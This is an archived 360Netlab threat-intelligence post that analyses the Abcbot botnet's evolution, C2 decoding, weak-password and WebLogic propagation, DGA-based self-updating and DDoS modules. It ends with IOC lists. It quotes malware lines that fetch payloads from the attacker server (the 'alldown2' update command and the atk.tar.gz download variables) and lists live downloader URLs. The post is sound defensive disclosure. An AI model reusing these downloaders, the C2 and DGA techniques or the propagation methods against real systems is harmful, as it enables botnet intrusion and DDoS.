Abcbot, an evolving botnet
By Alex.Turing
Published: 2021-11-09 · Archived: 2026-04-05 20:05:50 UTC
Background
Business on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also
continuing to focus on security incidents and trends on the cloud from its own expertise in the technology field.
The following is a recent security incident we observed, where the infected device IP came from multiple cloud
provider platforms.
On July 14, 2021, our BotMon system identified an unknown ELF file (a14d0188e2646d236173b230c59037c7)
generating a lot of scanning traffic, after analysis, we determined that this is a Go language implementation of
Scanner, based on its source path "abc-hello" string, we named it Abcbot internally.
At the beginning, Abcbot was relatively simple, and could be seen as a scanner for attacking Linux systems, with
a weak password & Nday vulnerability for worm-like propagation. One interesting thing is that Abcbot's source
path has the "dga.go" string, but no related DGA implementation was found . We assumed that its authors would
add this feature in subsequent versions, other than that, we did not paid too much attention to it.
As time passed, Abcbot has continued to evolve, and as we expected, it added the DGA feature in
subsequent samples . Today Abcbot has the ability to self-updating, setting up Webserver, laughing DDoS, as
well as worm like propagation.
On October 8, 2021, Trend Micro released an analysis of this family, which focused on the pre-SHELL scripts
that spread Abcbot, but skimmed over the features of Abcbot itself.
Given that Abcbot is under continuous development, its features are constantly being updated, we decided to write
this article to share our findings with the community.
Timeline
On July 14, 2021, abcbot was first captured with the main functionality of Scanner,WebServer.
July 22, 2021, abcbot updated to include dga-related code in the self-updating function.
October 10, 2021, abcbot performed minor update.
October 12, 2021, another update, with some major code structure changes.
October 21, 2021, another update, adding the open source ATK rootkit to support DDoS functionality.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 1 of 16

October 30, 2021, another update, abandoned ATK rootkit, to their own implementation of DDoS
functionality.
Abcbot Overview
We use the latest October 30, 2021 sample as a blueprint, this version targets mainly on common databases and
WEB servers, it uses weak password & Nday vulnerability to achieve worm-like propagation, the main focus is
for DDoS.
It currently supports the following nine attack methods.
tls Attack
tcp Attack
udp Attack
ace Attack
hulk Attack
httpGet Attack
goldenEye Attack
slowloris Attack
bandwidthDrain Attack
Its basic flow chart is shown below.
Sample Analysis
We captured a total of 6 different versions of abcbot samples, and the sample of October 30 was selected as the
main object of analysis in this paper, and its basic information is shown as follows.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 2 of 16

MD5:ae8f8cf967ca15a7689f2d1f79fbc5dc
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Packer:upx
Date:2021-10-30
Abcbot uses a standard UPX shell. When it runs in the compromised device, Abcbot confuses the user by copying
itself into the following files, then starting the dockerlogger, iptablesupdate processes.
/bin/dockerlogger
/usr/bin/dockerlogger
/etc/iptablesupdate
The iptablesupdate process is responsible for scanning for new infected devices, reporting the device
information to C2, and waiting for the execution of DDoS commands issued by C2.
The dockerlogger process is responsible for turning the infected device into a webserver, reporting the device
information to C2, and waiting for the execution of the Updata command issued by the update server, let’s take a
closer look.
0x01: Uploading device information to C2
The current Abcbot samples are hard-coded with a encrypted C2 string
("GEVQYYdjQdquLemMLYlkLLXLQmq7NmL7NYXu"), which is encoded using Base64 & XOR encryption.
The Base64 decoding operation is shown below, and it can be seen that Abcbot changes the Alphabet value, which
it uses as LMNu67PQX21pqrR3YZaDEFGbcVIJjkKWdefstghiBACHlSTUmO5noxyz04vw89+/
By dissociating the Base64 decoded result with 0x31 0x32 0x33 , the following final result can be obtained
http://103.209.103.16:26800
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 3 of 16

After decrypting C2, both iptablesupdate and dockerlogger processes report device information to C2 via the
path "/api/postip", and the format of the device information is OS:%v\x09CPU:%v\x09HX:%vh\x09os-name:%v\x09lanip:%v .
Note both processes collect the same device information and call the abc_hello_util_Os_pz function. The only
difference is shown in the figure below, which shows that the dockerlogger process appends "\td0.02" to the
reported information, while iptablesupdate appends "\ ti0.02", where the "d" and "i" characters imply the process
reporting the traffic, and "0.02" is similar to the version (in the October 21 sample, the version is "0.01").
The actual traffic generated is shown below.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 4 of 16

0x02: Scan and propagation
The "abc_hello_plugin_StartScan" function is responsible for infecting new devices. Its logic is to generate
random IPs, detect whether the ports on the IPs that can be attacked are open, and then attack the services by
either going through the corresponding weak password list or using the Nday vulnerabilities.
The following code snippet shows that Abcbot tries to attack Weblogic.
In the Abcbot sample, you can clearly see the functions used in the attack on the relevant network services.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 5 of 16

The weak passwords and vulnerabilities used by Abcbot are the following
SSH weak password
FTP weak password
PostgreSQL weak password
Redis weak password
Mssql weak password
Mongo weak password
WebLogic Vulnerability (CVE-2020-14882)
0x03: WebServer
Abcbot uses the "abc_hello_web_StartServer" function to start a WebServer on the infected device, listening on
port 26800, and the supported methods and paths are shown in the following table.
Method Path
POST /api/postip
POST /api/configlist
POST /api/getlist
POST /api/check
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 6 of 16

The actual effect is shown in the following figure.
At present, the path that really being called is "/api/check", which is used to determine whether the device has
already been infected by requesting the target ip:26800/api/check during the scanning and propagation process.
The other paths are only used to maintain connectivity and have no real use.When they are accessed, some logs
files will be generated in the path "/tmp.abchello".
In fact, using "curl-X POST" cmd to test C2, you can find that the above 4 paths also exist on C2. The author of
Abcbot seems to want to break the current C/S network model and bring the role of Bot in the network closer to
Server. Therefore, we speculate that the network structure of Acbbot may shift to P2P.
0x04: Self-updating
On July 22, Abcbot introduced the "abc_hello_util_Updata" function to handle self-updates. Its logic is to request
the "2.txt" resource from the remote server. The "2.txt" consists of two parts, which are in the format of
"Resource(hex format)|digital signature(hex format)" . When Bot successfully pulls the 2.txt, it will verify
the digital signature by the following code snippet.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 7 of 16

The hard-coded public key in the sample is
-----BEGIN RSA PUBLIC KEY-----
MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL3zj6XQt7gYe+L6oI/IUvlJNZVsg/JX\x0AC7TCnl9p1JfBJFdx+W9FTFnO2Fr8/hAUtf1NpP/WG2fg
-----END RSA PUBLIC KEY-----
After the verification is successful, the Resource is further decomposed, and the format of the Resource is
"cmd|downloader url| crc32|cmd2" .
When the cmd is "alldown2", the downloader url is requested and the crc32 hash value of the file is verified. The
downloaded file completes the process of self-updating.
The actual 2.txt obtained is shown below.
The Resource part is decoded in HEX format which represents update command.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 8 of 16

alldown2|http://103.209.103.16:26800/ff.sh|611043B5|posterrorurl
There are 3 sources for the remote server domain name in this process as follows.
1. Hard-coded TOR domain name (decryption method is the same as C2)
2. DGA algorithm generates prefix strings, which are spliced with 3 suffixes (.com, .tk, .pages.dev) to form
the domain name
3. DGA algorithm generates the string as a github account, and then gets the upgrade resources from this
github account
The code snippet below is the process of Abcbot requesting 2.txt resources from DGA generated domain name
and GITHUB repository.
The domain names used for the samples at each time point are shown below.
Date MD5 Res Tor Domain DGA Domain DGA Github
07-14 a14d0188e2646d236173b230c59037c7 0 0 0
07-22 e535215fad2ef0885e03ba111bd36e24 1 3/month 1/month
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 9 of 16

Date MD5 Res Tor Domain DGA Domain DGA Github
10-10 6e66456ffb457c52950cf05a6aaabe4a 1 3/month 0
10-12 39d373434c947742168e07cc9010c992 1 3/month 0
10-21 e95c9bae6e2b44c6f9b98e2dfd769675 0 27/month 0
10-30 ae8f8cf967ca15a7689f2d1f79fbc5dc 0 27/month 0
Part of DGA-generated domain names for Abcbot in October are shown below.
dgixyyfug.tk
dgixyyfug.com
dgixyyfug.pages.dev
guyfixdyg.tk
guyfixdyg.com
guyfixdyg.pages.dev
When Abcbot started to use DGA to generate domain names for updating servers, we grabbed some of them at the
first opportunity, which allowed us to measure its size. From the current statistics Abcbot is not very large, with a
total of 261 IPs.
The current distribution of infected hosts by service providers is shown below.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 10 of 16

0x05: DDoS
On October 21, Abcbot introduced the "main_TimeDDos" function to support DDoS attacks, its logic is to request
DDoS instructions from C2 via the path "/api/getlist", the instructions consist of 2 parts, "DDoS instruction (hex
format) | instruction digital signature (hex format)" . When Bot receives the instruction, it reuses the
digital signature in the self-renewal subsection above for verification, and can only execute it after the verification
is successful.
The actual traffic generated is shown below, the "73746f70" string before the "|" character is the "stop" instruction.
Interesting thing is that the sample on October 21 (md5:e95c9bae6e2b44c6f9b98e2dfd769675) uses the open
source ATK Rootkit to implement the DDoS function.
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 11 of 16

Abcbot modified the main function in the ATK source code file share_atk_svr.c , and implemented a UDP
server by monitoring SERV_PORT on 127.0.0.1 through the following code. SERV_PORT has 4, respectively
88,89,90,91.
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
// servaddr.sin_addr.s_addr = htonl(INADDR_ANY); // 0.0.0.0
servaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
servaddr.sin_port = htons(SERV_PORT);
When Abcbot receives the command sent by C2, it forwards the command to the UDP server, and the ATK rootkit
performs the DDoS attack. The code snippet shown below is exactly the DDoS command"BigUdp" forwarded to
the rootkit.
The supported commands are shown below.
stop
syn
dns
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 12 of 16

bigudp
We do not consider this approach to DDoS attacks a good one, as ATK rootkit is stored in the form of source
code on a remote server,
xl_x64scan1="http://103.209.103.16:26800/atk.tar.gz"
xl_x64scan2="http://103.209.103.16:26800/atk.tar.gz"
thus requires Abcbot to download the source code, compile, and load the rootkit module before performing DDoS
attack, this process requires too many steps, and any step that is faulty will result in the failure of the DDoS
function.
Apparently the author had same thoughts, and in the October 30 sample
(md5:ae8f8cf967ca15a7689f2d1f79fbc5dc) an update abandoned the ATK rootkit and implemented its own attack
module, with nine attack methods being supported.
Summary
In the process of reverse analysis, we found many oddities in Abcbot, such as "repeatedly reporting local device
information, not registering DGA domain names, unreasonable exclusion of TOR & Github resource servers, and
webserver functionality not really enabled", which gives us a feeling that Abcbot authors are testing various
technologies. The update process in these six months is not so much a continuous upgrade of features as a trade-off between different technologies. Abcbot is slowly moving from infancy to maturity. We do not consider this
stage to be the final form, there are obviously many areas of improvement or features to be developed at this stage.
Let's wait and see what happens.
Readers are always welcomed to reach us on Twitter or email us to netlab at 360 dot cn.
IOC
C2 & Resource Server
DGA Domain(October)
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 13 of 16

dgixyyfug.tk
dgixyyfug.com
dgixyyfug.pages.dev
guyfixdyg.tk
guyfixdyg.com
guyfixdyg.pages.dev
gfgiudyyx.tk
gfgiudyyx.com
gfgiudyyx.pages.dev
xgudyfyig.tk
xgudyfyig.com
xgudyfyig.pages.dev
yugxdigfy.tk
yugxdigfy.com
yugxdigfy.pages.dev
gdgiyyfxu.tk
gdgiyyfxu.com
gdgiyyfxu.pages.dev
gdiuyyfgx.tk
gdiuyyfgx.com
gdiuyyfgx.pages.dev
fgiudxyyg.tk
fgiudxyyg.com
fgiudxyyg.pages.dev
ygfydgxui.tk
ygfydgxui.com
ygfydgxui.pages.dev
DGA Domain(November)
enjuyzkpr.tk
enjuyzkpr.com
enjuyzkpr.pages.dev
rpzkjueyn.tk
rpzkjueyn.com
rpzkjueyn.pages.dev
nkrjpezyu.tk
nkrjpezyu.com
nkrjpezyu.pages.dev
unpeykzjr.tk
unpeykzjr.com
unpeykzjr.pages.dev
ypnuejrkz.tk
ypnuejrkz.com
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 14 of 16

ypnuejrkz.pages.dev
nerjyzkup.tk
nerjyzkup.com
nerjyzkup.pages.dev
nejpzykru.tk
nejpzykru.com
nejpzykru.pages.dev
knjpeuzyr.tk
knjpeuzyr.com
knjpeuzyr.pages.dev
zrkyenupj.tk
zrkyenupj.com
zrkyenupj.pages.dev
IP
103.209.103.16 China|Hong_Kong|Unknown AS63916|IPTELECOM_Global
Tor
http://vgnaovx6prvmvoeabk5bxfummn3ltdur3h4ilnklvaox4lge2rp4nzqd.onion
Sample MD5
0786c80bfcedb7da9c2d5edbe9ff662f
0f2619811ceaf85baa72f9c8f876a59a
1177c135f15951418219a97b3caad4e1
1a720cc74ecf330b8f13412de4d5646b
39d373434c947742168e07cc9010c992
3f277c7b4c427f9ef02cf8df4dd7be44
5d37a61451e5cfdeca272369ac032076
6e66456ffb457c52950cf05a6aaabe4a
6e66456ffb457c52950cf05a6aaabe4a
89ffd4f612ce604457446ee2a218de67
8f3558b29d594d33e69cea130f054717
a14d0188e2646d236173b230c59037c7
a17ea52318baa4e50e4b6d3a79fbd935
a4c7917787dc28429839c7d588956202
ae8f8cf967ca15a7689f2d1f79fbc5dc
baeb11c659b8e38ea3f01ad075e9df9a
c27d1c81a3c45776e31cfb384787c674
c64fbc7d3586d42583aa3a0dc3ea529f
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 15 of 16

e535215fad2ef0885e03ba111bd36e24
e95c9bae6e2b44c6f9b98e2dfd769675
Downloader
http://103[.209.103.16:26800/atk.tar.gz
http://103[.209.103.16:26800/dd.sh
http://103[.209.103.16:26800/ff.sh
http://103[.209.103.16:26800/linux64-shell
http://103[.209.103.16:26800/xlinux
Source: https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/
Page 16 of 16

The domain names Date MD5 used for the samples at each time point are Res Tor shown below. Domain DGA Domain DGA Github
07-14 a14d0188e2646d236173b230c59037c7 0 0 0
07-22 e535215fad2ef0885e03ba111bd36e24 1 3/month 1/month
 Page 9 of 16